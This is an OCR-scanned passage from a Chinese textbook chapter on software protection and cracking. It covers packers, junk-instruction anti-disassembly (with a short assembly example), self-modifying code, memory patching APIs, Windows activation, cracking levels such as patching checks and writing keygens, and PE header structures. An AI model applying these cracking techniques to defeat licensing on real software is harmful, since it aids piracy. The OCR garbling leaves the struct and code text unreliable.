外 壳 程 序 对 使 用 者 合法 性 的 检查 判断 后 ,解密 还 原 原 程序 ,并 为 原 程序 设置 好 运行 环境 ,使 
程序 可 靠 地 运行 。 只 有 正确 地 通过 了 验证 程序 验证 使 用 的 合法 性 ,才能 得 到 下 层 的 程序 ,并 
正确 地 按 加 密 者 思路 执行 下 去 。 如 果 通 不 过 验证 ,就 不 能 正常 退出 或 进入 死 循环 。 

加 壳 软 件 的 开发 者 需要 对 可 执行 文件 的 格式 有 深入 的 了 解 。 很 多 加 壳 软 件 在 加 壳 过 程 
中 除了 修改 人口 点 外 ,还 对 导入 表 ( 输 入 表 ) 做 了 破坏 ,以 达到 对 文件 的 保护 。 加 壳 软 件 在 运 
行 时 , 壳 先 执行 ,因为 加 壳 过 程 改 变 了 PE 文件 的 入 口 点 ;再 将 压缩 ,加 密 后 的 代码 还 原 成 原 
始 程序 代码 ,然后 把 执行 权 交还 给 原始 代码 。 对 于 有 压缩 功能 的 壳 , 壳 会 将 原文 件 的 代码 和 
数据 在 内 存 中 解压 缩 到 特定 的 位 置 ,必要 时 做 一 些 修复 ,然后 转移 到 原文 件 的 入口 点 (又 叫 
原始 入口 点 OEP) 执 行 。 对 于 有 保护 功能 的 壳 , 会 先 检 查 特 定 的 许可 条 件 是 否 满足 ,检查 是 
否 有 调试 器 在 运行 ,如 果 它 要 求 的 条 件 都 满足 , 才 转 移 到 原始 入 口 点 OEP 执行 。 

导 人 表 (Import Address Table, IAT) 也 称 为 导入 地 址 表 或 输入 表 , 由 于 导入 函数 就 是 
被 程序 调用 但 其 执行 代码 又 不 在 程序 中 的 函数 ,这 些 函 数 的 代码 位 于 一 个 或 者 多 个 DLL 
中 。 当 程序 文件 被 装 入 内 存 的 时 候 , Windows 装载 器 才 将 DLL 装 入 ,并 将 调用 导入 函数 的 
指令 和 函数 实际 所 处 的 地 址 联系 起 来 (动态 连接 ) ,这 就 需要 导入 表 完成 ,其 中 导入 地 址 表 就 
只 是 函数 实际 地 址 。 

通常 加 密 外 这 程序 包含 多 层 代 码 ,每 一 层 代码 都 拥有 反 跟 踪 、 解 密 还 原 下 层 代 码 的 程 
序 。 它 们 层 层 紧 扣 , 层 层 相关 。 只 有 正确 地 通过 了 上 层 的 代码 ,才能 得 到 下 层 的 程序 ,并 正 
确 地 按 加 密 者 思路 执行 下 去 。 在 通过 了 层 层 代码 后 ,才能 到 达 加 密 外 这 的 核心 区 域 一 一 验 
证 程序 。 验 证 程序 验证 使 用 的 合法 性 ,如 果 验 证 通过 ,就 还 原 原 来 的 程序 ,并 为 其 设置 初始 
环境 并 执行 。 如 果 通 不 过 验证 ,就 不 正常 退出 或 进入 死 循环 。 加 过 程序 文件 的 执行 步骤 
如 下 : 

(1) 壳 获 取 壳 自己 所 需要 使 用 的 应 用 程序 接口 (API) 地 址 (加 壳 后 的 程序 导入 表 一 般 
所 引入 的 DLL 和 API 很 少 ) ,动态 加 载 这 些 API。 

(2) 按 节 区 解密 原 程序 的 数据 ,并 存放 在 节 区 定义 的 合适 内 存 位 置 。 如 果 加 壳 时 用 到 
了 压缩 技术 ,那么 在 解密 之 前 还 要 解压 缩 。 

(3) 根据 程序 的 基地 址 重 定位 , 一般 EXE 文件 的 基地 址 为 0x400000, 而 运行 时 
Windows 提供 给 程序 的 也 同样 是 0x400000, 可 以 不 需要 进行 “ 重 定位 ”, 从 而 去 掉 重 定位 信 
息 节 区 以 减少 壳 的 大 小 ,但 Windows 没有 办 法 保证 每 次 DLL 运行 时 提供 相同 的 基地 址 。 
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(4) 模仿 Windows 系统 的 工作 来 填充 导入 表 中 相关 的 数据 一 一 HOOK-API 代码 的 地 
址 ,这 样 每 一 次 程序 与 系统 打交道 ,都 会 让 这 的 代码 获得 一 次 控制 权 , 用 来 进行 反 跟踪 继续 
保护 软件 或 完成 某 些 特殊 的 任务 。HOOK-API 通过 IAT 结构 来 调用 导入 的 系统 函数 。 
(5) 最 后 跳 转 到 程序 原 入 口 点 ,此 时 这 把 控制 权 交 还 给 原 程序 。 


7.2.4 花 指令 


花 指令 (Thunkcode) 是 利用 了 反 汇 编 时 单纯 根据 机 器 指令 字 来 决定 反 汇 编 结果 的 漏 
洞 ,在 不 影响 程序 正确 性 的 前 提 下 ,添加 的 一 些 干扰 反 汇编 和 设置 陷阱 的 代码 指令 ,对 程序 
代码 做 变形 处 理 。 具 有 花 指令 的 软件 故意 将 错误 的 机 器 指令 放 在 了 错误 的 位 置 ,让 软件 破 
解 者 错误 地 反 汇编 出 来 而 无 法 理解 程序 代码 ,这 也 是 很 多 病毒 木马 编写 免 杀 代码 的 方法 。 

花 指令 杜绝 了 先 把 程序 打印 下 来 再 慢 慢 分 析 的 做 法 。 因 为 不 同 的 机 器 指令 包含 的 字 节 
数 并 不 相同 ,有 的 是 单字 节 指 令 , 有 的 是 多 字 节 指令 。 对 于 多 字 节 指令 来 说 , 反 汇 编 软件 需 
要 确定 指令 的 第 一 个 字 节 的 起 始 位 置 ,也 就 是 操作 码 的 位 置 ,这 样 才能 正确 地 反 汇 编 这 条 指 
令 , 和 否则 它 就 可 能 反 汇 编 成 另外 一 条 指令 。 花 指令 就 是 在 指令 流 中 插入 许 多 垃圾 指令 ,干扰 
反 汇 编 , 同 时 也 不 影响 程序 的 正确 运行 。 

花 指 令 是 要 对 代码 段 B 进行 保护 ,可 以 直接 将 花 指 令 块 A 加 到 B 之 前 ,可 以 使 用 任何 
一 个 多 字 节 指 令 的 机 器 指令 字 来 代替 Thunkcode, 欺 骗 反 汇编 软件 将 它 连同 后 面 指令 的 前 
边 某 一 部 分 反 汇 编 成 一 个 多 字 节 指令 。 使 用 了 花 指 令 的 地 方 一 般 都 会 出 现 这 样 的 现象 : 一 
个 跳 转 指令 , 跳 转 到 了 某 条 语句 的 中 间 位 置 ,而 不 是 这 条 语句 的 开始 位 置 。 显 然 破解 它 的 办 
法 就 是 在 那个 跳 转 到 的 目的 地 址 之 前 将 中 间 的 代码 全 部 nop 掉 。 为 了 加 强 难度 ,可 以 将 若 
干 个 花 指 令 结合 起 来 使 用 , 尽 可 能 地 用 call 和 push 实现 间接 跳 转 。 例 如 : 


call label 1 

db thunkcode 

jmp label 2 

db thunkcode 
label 1: 

pop eax 

jmp label 3 

db thunkcode, thunkcode, thunkcode 
label 3: 

inc eax 

jmp label 4 

db thunkcode, thunkcode, thunkcode 
label 4: 

jmp eax 

db thunkcode 


;被 保护 代码 


7.2.5 SMC 技术 
SMC(Self-Modifying Code) 自 修改 代码 技术 是 可 以 在 一 段 代码 执行 之 前 先 对 它 进 行 修 
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改 的 。 利 用 SMC 技术 的 这 个 特点 ,把 代码 以 加 密 形式 保存 在 可 执行 文件 中 ,在 程序 执行 时 
再 动态 解密 ,这 样 可 以 有 效 对 付 静 态 分 析 。 
利用 SMC 技术 可 以 设计 出 多 层 嵌 套 加 密 的 代码 ,如 
图 7.1 所 示 。 第 一 层 代码 解密 出 第 二 层 代码 ,而 第 二 层 代码 | 智 层 
则 解密 出 第 三 层 代码 , 依 此 类 推 。 第 3 层 
因此 ,SMC 技术 既 可 以 用 作 软 件 自身 的 加 密 保护 ,也 可 
以 用 于 给 软件 打 补丁 (内 存 补丁 ), 即 使 是 有 壳 保 护 的 软件 。 。 图 7 1 多 技术 丰 加 密 的 代码 


7.2.6 补丁 技术 


1. 补丁 概念 

软件 补丁 分 为 文件 补丁 和 内 存 补丁 两 种 。 文 件 补丁 就 是 对 EXE .DLL 等 PE 格式 目标 
文件 的 数据 进行 修改 ,达到 一 劳 永 逸 的 效果 ,主要 针对 没 加 密 保护 的 程序 文件 。 内 存 补丁 是 
对 正在 加 载 或 运行 的 目标 程序 的 数据 在 内 存 中 进行 修改 ,以 达到 某 种 预期 目的 和 效果 ,主要 
针对 被 加 密 、 加 壳 、.CRC 校 验 等 保护 的 目标 程序 。 程 序 的 破解 更 新 、 升 级 都 可 以 应 用 补丁 
技术 。 

在 计算 机 软件 中 补丁 的 应 用 比较 多 。 例 如 微软 的 程序 发 布 后 ,每 隔 一 段 时 间 就 会 免费 
发 布 针 对 该 程序 的 PACK 包 , 对 它 的 漏洞 或 BUG 进行 修补 ,这 些 PACK 包 就 是 一 种 文件 
补丁 ,以 保护 软件 免 受 黑客 或 蠕虫 的 攻击 ,有 的 文件 补丁 也 是 为 了 破解 软件 。 玩 游戏 时 利用 
“ 整 人 专家 ”修改 游戏 参数 ,“ 整 人 专家 ”就 是 一 个 复杂 的 内 存 补丁 ,内 存 补丁 一 般 用 于 软件 破 
解 ,但 也 可 用 于 软件 的 实时 监控 保护 。 内 存 补丁 工具 一 般 使 用 Process Patcher 和 
XMenPacth, 文 件 补 丁 工具 一 般 使 用 DUP。 

2. 补丁 原理 

软件 补丁 都 要 修改 目标 程序 以 达到 完善 功能 和 修补 漏洞 或 BUG 的 目的 ,但 一 般 不 是 
仅仅 修改 程序 的 纯 数 据 , 而 且 还 要 调用 自己 新 定义 的 函数 (在 DLL 中 ), 这 就 需要 非常 了 解 
PE 文件 的 格式 ,修改 Import Table 的 内 容 和 存放 位 置 ,让 程序 在 加 载运 行 的 同时 加 载 自 定 
义 的 DLL ,并 做 好 重 定位 。 

Windows 是 一 个 抢占 式 的 操作 系统 ,每 个 进程 都 拥有 自己 的 运行 空间 。 每 次 当 操作 系 
统 切 换 到 另 一 个 进程 时 ,虚拟 内 存 映射 也 就 跟着 切换 到 当前 的 进程 。 内 存 补丁 的 总 体 思想 
就 是 在 某 个 (解密 、 解 压 或 已 经 校 验 ) 时 刻 , 在 目标 程序 的 地 址 空间 中 修改 数据 ,因此 也 被 称 
为 加 载 器 loader。 一 般 情况 下 用 户 不 能 修改 操作 系统 ,也 不 能 对 程序 本 身 进行 修改 ,实现 的 
方法 是 从 另 一 个 进程 中 获得 对 目标 程序 地 址 空间 的 访问 权 。 微 软 提供 一 个 接口 ,可 对 其 他 
进程 的 空间 进行 读 写 的 API 函数 ,用 户 所 要 做 的 是 通过 某 种 方式 得 到 目标 程序 进程 ID 号 ， 
利用 API 函数 对 其 进行 修改 。 常 用 的 内 存 补丁 相关 的 API 函数 如 表 7. 1 所 示 。 

表 7.1 常用 的 内 存 补丁 相关 的 API 函数 
函数 作 用 
KERNEL32: ReadProcessMemory 读 取 指定 进程 的 内 存 


第 1 层 


KERNEL32: WriteProcessMemory 写 入 指定 进程 的 内 存 
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续 表 
函数 作 用 
KERNEL32: OpenProcess 打开 指定 进程 的 内 存 
KERNEL32: CreateProcessA 建立 一 个 进程 的 内 存 , 使 被 装载 的 程序 运行 起 来 
USER32: GetWindowThreadProcessId 获得 进程 标识 符 
USER32: FindWindowExA 返回 符合 指定 的 类 名 和 窗口 名 的 窗口 句柄 


7.2.7 软件 许可 一 一 激活 技术 


专用 软件 已 数 十 年 地 实施 各 种 许可 方案 ,软件 许可 (Software Licensing) 提 供 了 一 种 保 
护 软件 产品 的 方法 ,防止 未 授权 的 使 用 或 复制 。 在 早期 离线 许可 方案 中 ,一般 需 要 供应 商 为 
客户 提供 注册 密 钥 或 序列 号 ,无 须 使 用 互联 网 进行 通信 ,所 需 的 验证 注册 码 的 逻辑 都 必须 内 
置 于 软件 本 身 。 这 种 简单 的 机 制 没有 防止 盗版 ,任何 软件 副本 都 可 以 使 用 相同 的 注册 密 钥 ， 
不 能 防止 逆向 工程 。 

软件 产品 激活 不 是 将 实际 密 钥 存储 在 程序 数据 中 ,大 多 数 许可 方案 是 基于 用 户 输入 或 
安装 软件 计算 机 的 性 能 动态 生成 密 钥 。 

微软 从 Windows XP 开始 在 自己 产品 注册 过 程 中 使 用 这 些 技 术 , 微 软 称 之 为 激活 
(Activation) 。 激 活 时 用 户 提供 购买 的 唯一 的 25 个 字符 产品 密 钥 , 当 用 户 执行 激活 过 程 时 ， 
使 用 加 密 算法 从 产品 密 钥 派生 一 个 72 位 的 产品 ID ,根据 计算 机 的 硬件 组 件 ( 包 括 处 理 器 类 
型 和 序列 号 .内存 数量 、 硬 盘 驱动 器 设备 名 称 和 序列 号 以 及 MAC 地 址 ?计算 出 64 位 硬件 的 
散 列 ,再 将 产品 ID 和 硬件 散 列 网 络 发 送 给 Microsoft 进行 认证 检查 。 

当 微 软 接收 到 产品 ID 和 硬件 散 列 时 , 它 检查 该 产品 ID 是 不 是 由 微软 发 布 的 ,还 是 伪造 
的 或 盗版 的 。 如 果 产 品 ID 是 有 效 的 , 则 发 布 存储 在 该 计算 机 上 的 数字 签名 注册 码 。 在 启动 
时 , Windows 会 检查 注册 码 是 否 存在 ,也 会 检查 在 激活 过 程 中 创建 的 硬件 散 列 是 否 与 系统 
当前 的 硬件 配置 文件 相 匹配 ,从 而 防止 用 户 激活 多 台 计算 机 上 的 Windows。 

为 了 使 用 户 在 更 换 或 修理 计算 机 硬件 方面 更 具 灵 活性 ,这 种 检查 使 用 简单 的 投票 方案 。 
产品 激活 软件 为 每 个 与 当前 存储 硬件 配置 文件 相 匹配 的 设备 投票 表决 ,XP 使 用 7 票 吻合 
确认 成 功 。 

Windows 激活 是 有 效 的 ,因为 它 已 成 为 操作 系统 的 一 部 分 ,很 难 对 其 应 用 逆向 工程 , 因 
为 任何 环境 都 是 动态 的 (表现 为 目标 正在 运行 ) ,会 阻止 逆向 工程 执行 分 析 。 

上 述 方案 能 防御 一 些 攻击 ,包括 伪造 许可 密 钥 或 注册 证 书 、 在 多 台 机 器 上 安装 软件 和 软 
件 转 售 。 致 命 的 缺陷 是 如 果 攻 击 者 能 改变 软件 的 机 器 代码 “如 果 注 册 成 功 , 继 续 执行 ”, 则 可 
以 跳 过 许可 的 验证 过 程 。 在 线 保 护 或 网 络 激活 可 通过 版 本 升级 .补丁 或 激活 机 制 进行 保护 。 


7.2.8 软件 保护 小 结 


在 实际 运用 中 ,经 常 要 使 用 以 上 好 几 种 技术 来 提高 软件 的 保护 强度 。 软 件 加 密 是 软件 
保护 的 重要 手段 ,能 给 非法 拷贝 或 非法 使 用 造成 障碍 ,增加 了 破解 的 难度 。 软 件 加 密 防 破解 
的 一 个 最 好 方法 就 是 对 程序 加 壳 ,并 绑 定 硬件 信息 ,验证 信息 分 散在 程序 各 部 分 并 不 定时 验 
证 或 监护 。 对 软件 的 保护 仅仅 靠 技术 是 不 够 的 ,最 终 要 靠 人 们 的 知识 产权 意识 和 法 制 观念 
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的 进步 。 
7.3 软件 破解 原理 与 技术 


软件 的 分 析 破 解 技术 与 保护 技术 是 一 对 矛 与 盾 的 关系 ,它们 在 互相 斗争 中 发 展 进化 ,这 
种 较量 归根 到 底 是 一 种 利益 的 冲突 。 软 件 开发 者 为 了 维护 自身 的 商业 利益 ,不 断 地 寻找 各 
种 有 效 的 技术 来 保护 自身 的 软件 版 权 , 增 加 其 保护 强度 ,推迟 软件 被 破解 的 时 间 ; 而 破解 者 
出 于 利益 驱使 或 个 人 兴趣 不 断 制作 新 的 破解 工具 ,针对 新 出 现 的 保护 方式 进行 跟踪 分 析 以 
找到 相应 的 破解 方法 。 


7.3.1 软件 破解 原理 


理论 上 任何 软件 只 要 能 完整 运行 所 有 功能 一 次 即 可 破解 。 也 就 是 说 ,在 Cracker 不 增 
加 功能 模块 的 前 提 下 ,任何 软件 如 果 所 有 功能 都 能 够 在 本 地 机 器 上 运行 至 少 一 次 ,那么 这 个 
软件 经 过 修改 一 定 可 以 无 限制 地 在 本 地 机 器 上 运行 所 有 功能 , 即 可 以 被 破解 。 可 以 证 明 : 
在 软件 运行 每 一 个 功能 模块 时 抽出 (理论 上 ) 此 功能 模块 代码 ,然后 将 它们 组 合 就 成 为 破解 
后 的 软件 了 。 

逆 命 题 也 成 立 : 如 果 一 个 软件 可 以 被 破解 ,那么 它 的 所 有 功能 一 定 可 以 在 本 地 机 器 上 
运行 至 少 一 次 。 证 明 : 假设 某 软件 已 经 被 破解 ,但 是 它 的 某 个 功能 不 能 在 本 地 机 器 上 运行 ， 
也 就 是 说 从 软件 中 得 不 到 这 个 模块 的 代码 ,但 前 提 是 Cracker 不 增加 功能 模块 ,所 以 与 前 提 
矛盾 。 

因此 ,一 个 软件 可 以 被 破解 等 价 于 它 的 所 有 功能 可 以 在 本 地 机 器 上 运行 至 少 一 次 。 也 
就 是 说 ,一 个 软件 不 能 被 破解 等 价 于 它 不 可 能 在 本 地 机 器 上 运行 所 有 功能 一 次 。 

破解 原理 为 : Cracker 在 对 受 保 护 软件 的 发 行 、 安 装 、 使 用 过 程 和 特点 进行 软件 分 析 后 ， 
利用 各 种 工具 找 出 软件 的 保护 弱点 或 疑点 ,形成 破解 信息 集合 ,然后 根据 破解 信息 利用 工具 
破解 受 保护 的 软件 ,经 过 反复 实验 得 到 较 好 的 破解 软件 。 

从 理论 上 说 ,几乎 没有 破解 不 了 的 保护 。 但 是 ,如 果 一 种 保护 技术 的 强度 强 到 足以 让 破 
解 者 在 软件 的 生命 周期 内 无 法 将 其 完全 破解 ,这 种 保护 技术 就 可 以 说 是 非常 成 功 的 。 软 件 
保护 方式 的 设计 应 在 一 开始 就 作为 软件 开发 的 一 部 分 来 考虑 , 列 人 开发 计划 和 开发 成 本 中 ， 
并 在 保护 强度 .成 本 、 易 用 性 之 间 进 行 折 中 考虑 ,选择 一 个 合适 的 平衡 点 。 在 进行 软件 的 破 
解 .解密 分 析 工作 中 ,对 软件 机 器 代码 程序 进行 分 析 , 必须 对 可 执行 程序 文件 (PE 文件 ) 格 
式 非 常熟 悉 , 并 使 用 静态 或 动态 调试 工具 ,分 析 并 跟踪 其 汇编 代码 。 

当前 软件 保护 的 关键 误区 是 “简单 地 通过 条 件 判 断 语句 来 “甄别 ?合法 用 户 ”, 就 是 说 把 
整个 保护 的 “终审 权 ? 交 给 一 个 简单 的 条 件 判断 语句 。“ 不 论 前 述 认 证 结果 正确 与 否 ,都 将 该 
认证 结果 再 次 作为 算 子 ,经 过 必要 运算 后 对 发 行 前 已 受 保护 的 软件 核心 功能 代码 进行 解码 ” 
这 种 思想 也 不 能 彻底 解决 问题 。 对 受 保护 的 软件 ,有 越 来 越 多 的 Cracker 来 试图 破解 ,并 有 
相当 一 部 分 人 取得 了 成 功 。 

破解 也 分 等 级 ,初级 破解 主要 使 用 W32Dasm 等 静态 分 析 工 具 , 用 UltraEdit 等 十 六 进 
制 编辑 器 修改 exe 等 可 执行 文件 , 称 为 暴力 解密 ,简称 爆破 或 暴 破 ;中 级 破解 主要 使 用 
TRW2000 等 动态 分 析 工 具 跟 踪 出 软件 的 注册 码 ; 高 级 破解 使 用 动态 分 析 工 具 追 踪 出 注册 
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码 的 计算 过 程 和 计算 方法 ,根据 其 计算 方法 用 任 一 编程 工具 (如 VB、VC、Delphi) 编 写 出 软 
件 的 注册 机 。 


7.3.2 PE 文件 格式 


在 Windows 下 所 有 的 可 执行 文件 (Portable Executable File) 都 是 基于 微软 设计 的 一 种 
新 的 文件 格式 , 即 PE 文件 格式 。 破 解 者 需要 对 这 些 PE 文件 进行 适当 修改 。 

1. PE 文件 框架 与 装载 过 程 

所 有 PE 文件 (甚至 32 位 的 DLLs) 必须 以 一 个 简单 的 DOS MZ header 开始 ,在 偏 移 0 
处 有 DOS 下 可 执行 文件 的 “MZ 标志 ”"。 有 了 它 ,一 旦 程序 在 DOS 下 执行 ,DOS 就 能 识别 出 
这 是 有 效 的 执行 体 ,然后 运行 紧 随 MZ header 之 后 的 DOS stub。DOS stub 实际 上 是 一 个 
有 效 的 EXE, 在 不 支持 PE 文件 格式 的 操作 系统 中 , 它 将 简单 显示 一 个 错误 提示 ,类 似 于 字 
符 串 "This program cannot run in DOS mode" ,或 者 程序 员 可 根据 自己 的 意图 实现 完整 的 
DOS 代码 。 通 常 DOS stub 由 汇编 器 /编译 器 自动 生成 ,对 破解 的 用 处 不 是 很 大 , 它 简 单调 
用 中 断 21h 服务 9 来 显示 字符 串 "This program cannot run in DOS mode"。 紧 接着 DOS 
stub 的 是 PE header。PE header 是 PE 相关 结构 IMAGE_NT_HEADERS 的 简称 ,其 中 包 
含 了 许多 PE 装载 器 用 到 的 重要 域 。 可 执行 文件 在 支持 PE 文件 结构 的 操作 系统 中 执行 时 ， 
PE 装载 器 将 从 DOS MZ header 的 偏 移 3CH 处 找到 PE header 的 起 始 偏 移 量 , 因 而 跳 过 了 
DOS stub 直接 定位 到 真正 的 文件 头 PE header。PE 文件 结构 的 总 体 层次 分 布 如 表 7. 2 
所 示 。 


表 7.2 PE 文件 格式 

字 段 名 描述 
DOS MZ header DOS MZ 头 部 ,判断 16/32 位 
DOS stub DOS 根 ,16 位 程序 用 
PE header Win32 程序 的 格式 头 部 
Section table 节 区 表 , 分 配 节 区 地 址 
Section 1 节 1 
Section 2 节 2 
Section… 节 , 专 存 代码 ,数据 或 资源 等 
Section n 节 n 


PE 文件 的 真正 内 容 划分 成 块 , 称 为 sections( 节 )。 每 节 是 一 块 拥有 共同 属性 的 数据 ， 
比如 . text、. data 等 节 。 一 个 Windows 的 应 用 程序 典型 地 拥有 9 个 预定 义 节 , 它 们 是 可 执 
行 代 码 (. code、. text) .数据 (DATA.、. bss、. rdata、. data) 、 资 源 (. rsrc)、 导 出 数据 (. edata) 、 
导入 数据 (. idata) 、 重 定位 信息 (. reloc) ,版 权 (. descr) .异常 (. pdata) 和 调试 信息 (. debug)。 
并 非 所 有 的 应 用 程序 都 需要 这 些 节 , 也 有 一 些 应 用 程序 为 了 特殊 的 需要 而 定义 了 其 他 节 。 
如 果 对 PE 格式 的 文件 进行 修改 ,理论 上 讲 可 以 写 人 任何 一 个 节 内 ,并 调整 此 节 的 属性 就 可 
以 了 。PE header 接 下 来 的 数组 结构 是 section table( 节 表 )。 每 个 结构 包含 对 应 节 的 属性 、 
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文件 偏 移 量 和 虚拟 偏 移 量 等 。 如 果 PE 文件 里 有 5 个 节 ,那么 此 结构 数组 内 就 有 5 个 成 员 。 

节 有 时 也 称 为 节 区 ,PE 格式 文件 是 按 节 区 进行 规划 组 织 的 ,不 同 的 节 区 一 般 保存 数据 
的 作用 也 不 相同 。 节 区 名 称 和 节 区 中 的 数据 其 实 没 有 必然 的 联系 , 节 区 中 保存 的 数据 也 没 
有 什么 硬性 的 限制 ,可 以 在 编译 时 用 开关 参数 改变 它们 。 

程序 文件 在 运行 时 Windows 系统 也 是 按 节 区 加 载 的 , 节 区 的 起 始 地 址 由 基地 址 决定 。 
在 程序 的 文件 头 部 保存 了 每 个 节 区 的 描述 信息 ,如 有 节 区 名 称 、 大 小 和 相对 虚拟 地 址 
(RVA) 等 。 RVA 加 上 基地 址 (ImageBase) 就 定位 节 区 在 内 存 中 的 虚拟 地 址 (VA) 了 。 

PE 文件 执行 时 内 存 中 的 数据 结构 布局 和 在 磁盘 中 的 是 一 致 的 。 首 先 由 PE 装载 器 为 
进程 分 配 一 个 4GB 的 虚拟 地 址 空间 ,然后 把 程序 所 占用 的 磁盘 空间 作为 虚拟 内 存 映射 到 这 
个 虚拟 地 址 空间 中 (一 般 映射 到 虚拟 地 址 空间 中 的 0x400000 的 位 置 )。 内 存 中 的 版 本 称 为 
模块 (Module) ,映射 文件 的 起 始 地 址 称 为 模块 句柄 (hModule) ,可 以 通过 模块 句柄 访问 内 存 
中 的 其 他 数据 结构 ,这 个 初始 内 存 地 址 也 称 为 文件 映像 基 址 (ImageBase)。PE 装载 器 检查 
DOS MZ header 里 的 PE header 偏 移 量 ,如 果 找 到 , 则 跳 转 到 PE header; 装 载 器 再 检查 PE 
header 的 有 效 性 ,如 果 有 效 就 跳 转 到 PE header 的 尾部 。 装 载 器 读 取 节 表 中 的 节 信 息 ,并 采 
用 文件 映射 方法 将 这 些 节 映射 到 内 存 , 同 时 附 上 节 表 里 指定 的 节 属 性 。 然 后 装载 器 处 理 PE 
文件 中 类 似 import table( 引 入 表 ) 逻 辑 部 分 ,装载 应 用 程序 所 使 用 的 动态 链接 库 。PE 装载 
器 执行 PE 文件 首部 所 指定 地 址 处 的 代码 ,开始 执行 应 用 程序 主线 程 。 

2. PE 文件 头 概述 

在 winnt. h 这 个 文件 中 可 以 找到 关于 PE 文件 头 的 定义 : 


typedef struct IMAGE NT HEADERS { 

DWORD Signature; 

//EE 文 件 头 标志 PE\O\0。 在 开始 DOS header 的 偏 移 3cH 处 所 指向 的 地 址 开始 
IMAGE, FILE HEADER FileHeader; // 开 文件 物理 分 布 的 信息 
IMAGE OPTIONAL HEADER32 OptionalHeader;  //PE 文 件 逻 辑 分 布 的 信息 

} IMAGE NT HEADERS32, * PIMAGE NT HEADERS32; 


typedef struct _IMRAGE FILE HEADER { 


WORD Machine; // 该 文件 运行 所 需要 的 CPU, 对 于 Intel 平 台 是 14CH 
WORD NunberOfSections; // 文 件 的 节 数 目 

DWORD TimeDatestamp; // 文 件 创建 日 期 和 时 间 

DWORD PointerTosymbolTable; // 用 于 调试 

DWORD 。” NumberOfSynbols; // 符 号 表 中 符号 个 数 

WORD SizeOfOptionalHeader; //optionalHeader 结构 大 小 

WORD Characteristics; // 文 件 信息 标记 ,区 分 文件 是 exe 还 是 dl1 


} IMAGE FILE HEADER, * PIMAGE, FILE HEADER; 


typedef struct IMAGE OPTIONAL HEADER { 


WORD Magic; // 标 志 字 (总 是 010bh) 
BYTE MajorLinkerVersion; // 连 接 器 版 本 号 

BYTE MinorLinkerVersion; // 连 接 器 次 版 本 号 
DWORD SizeOfCode; // 代 码 段 大 小 


DWORD SizeOfInitializedData; // 已 初始 化 数据 块 大 小 
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DWORD SizeOfUninitializedData; 
DWORD AddressofEntryPoint; 
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// 未 初始 化 数据 块 大 小 


//BE 装 载 器 准备 运行 的 亚 文件 的 第 一 个 指令 的 RVA, 若 要 改变 整个 执行 的 流程 ,可 以 将 该 值 指定 
// 到 新 的 RVA, 这 样 新 RVA 处 的 指令 首先 被 执行 


DWORD BaseOfCode; 
BaseOfData; 


ImageBase; 


DWORD 
DWORD 
DWORD 
DWORD 
WORD 
WORD 
WORD 
WORD 
WORD 
WORD 
DWORD 
DWORD 
DWORD 
DWORD 
WORD 
WORD 
DWORD 
DWORD 
DWORD 
DWORD 
DWORD 
DWORD 


SectionAlignment; 
FileAlignment; 
MajorOperatingSystemVersion; 
MinorOperatingSystemVersion; 
MajorImageVersion; 
MinorImageVersion; 
MajorSubsystemVersion; 
MinorSubsystemVersion; 
Win32VersionValue; 
SizeOfImage; 

SizeOfHeaders; 

CheckSum; 

Subsystem; 
DllCharacteristics; 
SizeOfSstackReserve; 
SizeofstackCommit; 
SizeOfHeapReserve; 
SizeOfHeapCommit; 
LoaderFlags; 
NunmberOfRvaAndSizes; 


// 代 码 段 起 始 RVA (Relative Virtual Adress, 相 对 虚拟 地 址 ) 


// 数 据 段 起 始 RVA 
//EE 文 件 的 装载 地 址 
// 块 对 齐 

// 文 件 块 对 齐 

// 所 需 操 作 系统 版 本 号 


// 用 户 自 定义 版 本 号 


//Win32 子 系统 版 本 。 若 PE 文件 是 专门 为 in32 设 计 的 
// 该 子 系统 版 本 必定 是 4.0, 否 则 对 话 框 不 会 有 三 维 立 体感 


// 保 留 

// 内 存 中 整个 亚 映 像 体 的 尺寸 

// 所 有 头 + 节 表 的 大 小 

// 校 验 和 

/NT 用 来 识别 BE 文件 属于 哪个 子 系 统 


IMAGE DATA DIRECTORY DataDirectory [IMAGE NUMBEROF DIRECTORY ENTRIES]; 
//IMAGE_DATA_DIRECTORY 结构 数组 。 每 个 结构 给 出 一 个 重要 数据 结构 的 RVA, 比 如 引入 地 址 表 等 
} IMAGE OPTIONRAL HEADER32, * PIMAGE, OPTIONAL HEADER32; 


typedef struct IMAGE DATA DIRECTORY { 
DWORD VirtualAddress; 
DWORD Size; 


// 表 的 RVA 地 址 
// 大 小 


} IMAGE DATA DIRECTORY, * PIMAGE DATA DIRECTORY; 


PE 文件 头 后 是 节 表 ,在 winnt. h 下 如 下 定义 : 


typedef struct IMAGE SECTION HEADER { 
BYTE Name[IMAGE SIZEOF SHORT NAME]; 
union { 

DWORD PhysicalAddress; 

DWORD VirtualSize; 

} Misc; 
DWORD VirtualAddress; 
DWORD SizeOfRawData; 


// 节 表 名 称 ,如 .text 


// 物 理 地 址 
// 真 实 长 度 


//RVA 
// 物 理 长 度 
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DWORD PointerToRawData; // 节 基于 文件 的 偏 移 量 


DWORD PointerToRelocations; // 重 定位 的 偏 移 
DWORD PointerToLinenumbers; // 行 号 表 的 偏 移 
WORD NumberOfRelocations; // 重 定位 项 数目 
WORD NumberOfLinenumbers; // 行 号 表 的 数目 
DWORD Characteristics; // 节 属性 


} IMAGE SECTION HEADER, * PIMAGE SECTION HEADER; 


3. 输入 表 (Import Table) 

输入 函数 是 被 程序 调用 但 其 执行 代码 又 不 在 程序 中 的 函数 ,代码 位 于 相关 DLL 文件 
中 。 只 有 当 PE 文件 被 装 和 内 存 后 , Windows 的 PE 装载 器 才 将 相关 DLL 装 入 ,并 将 调用 
输入 函数 的 指令 和 函数 实际 所 处 的 地 址 联系 起 来 , 即 动态 链接 。 动 态 链接 是 通过 PE 文件 
的 输入 表 IT(Import Table) 来 完成 的 。 输 入 表 ( 也 称 为 导 和 地址 表 ) 中 保存 输入 的 函数 名 及 
其 驻 留 的 DLL 名 等 动态 链接 所 需 信 息 。PE 头 可 选 映像 头 (IMAGE_OPTIONAL_ 
HEADER32) 中 有 一 项 DataDirectory 的 第 二 个 成 员 指向 输入 表 。 

输入 表 以 一 个 IMAGE_IMPORT_DESCRIPTOR (简称 IID) 数 组 开始 : 


IMAGE IMPORT DESCRIPTOR struct 


union { 


DWORD OriginalFirstThunk; € ;4Byte 指向 输入 名 称 表 的 RVA 
js 
TimeDatestamp DWORD ;04h 4Byte ”被 输入 的 DLL 绑 定时 间 
ForwarderChain DWORD ;08h 4Byte ”被 转向 的 API 索引 
